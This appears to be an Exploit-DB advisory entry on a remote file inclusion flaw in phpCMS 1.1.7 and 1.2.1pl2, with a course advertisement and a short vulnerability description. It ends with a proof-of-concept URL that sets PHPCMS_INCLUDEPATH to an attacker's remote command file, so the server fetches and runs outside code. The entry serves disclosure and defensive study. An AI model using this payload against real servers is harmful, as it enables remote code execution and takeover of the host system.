phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion

EDB-ID:

29346




Platform:

PHP

Date:

2006-12-26


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/21768/info
   
phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
   
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
   
Versions 1.1.7 and 1.2.1pl2 are vulnerable; other versions may also be affected.

http://www.example.com/[pc_path]/parser/include/class.session_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]